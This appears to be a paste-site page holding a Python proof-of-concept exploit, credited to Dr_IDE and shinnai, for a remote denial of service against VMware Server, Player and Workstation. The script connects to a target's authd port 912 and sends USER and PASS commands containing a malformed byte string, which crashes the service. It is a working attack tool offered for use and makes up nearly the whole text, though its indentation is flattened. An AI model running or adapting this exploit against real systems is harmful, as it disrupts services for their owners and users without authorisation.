Donate Bitcoins
New speed improvements!
Admin Password
    1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
#!/usr/bin/env python
###########################################################
#
# VMware Server 2.x (vmware-authd.exe) Remote DoS Exploit
# Found By: Dr_IDE
# Original Approach and Findings By: shinnai
# Tested on Windows 7RC, XPSP3
#
# Note: This is more of an update to shinnai's original PoC
# This will now successfully DoS at least the following:
#
# -VMware Server 2.0.0.2073
# -VMware Player 2.5.3
# -WMware Workstation 6.5.3
#
#
###########################################################
import socket, sys
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
print ("\n\n#####################################################");
print ("# \"Universal\" VMware auth-d Remote DoS Exploit #");
print ("# By: Dr_IDE #");
print ("# Credits to: shinnai #");
print ("# Usage: ./script <target IP> #");
print ("#####################################################");
print ("[*] Connecting to target.");
s.connect((sys.argv[1], 912));
d = s.recv(1024);
print ("[i] Server response: \n");
print (d);
s.send('USER \x25\x90 \r\n'); # \x80 and higher seems to work
print ('[*] Sending command "USER" + evil string.\n');
d = s.recv(1024);
print ("[i] Server response: " + d);
s.send('PASS \x25\x90 \r\n'); # \x80 and higher seems to work
print ('[*] Sending command "PASS" + evil string.\n');
try:
d = s.recv(1024);
print ("[i] Server response: " + d);
except:
print ("[*] Exploit completed successfully.");
except:
print ("[-] Error, Could not connect to the auth-d server.");
#[pocoftheday.blogspot.com]

Enjoy the site? All donations are appreciated. Paypal or BTC

Donate Bitcoins
Free Text Host is brought to you by Dagon Design
This site contains no adware, spyware, or popups
Questions? Comments?     Privacy Policy     Report abuse here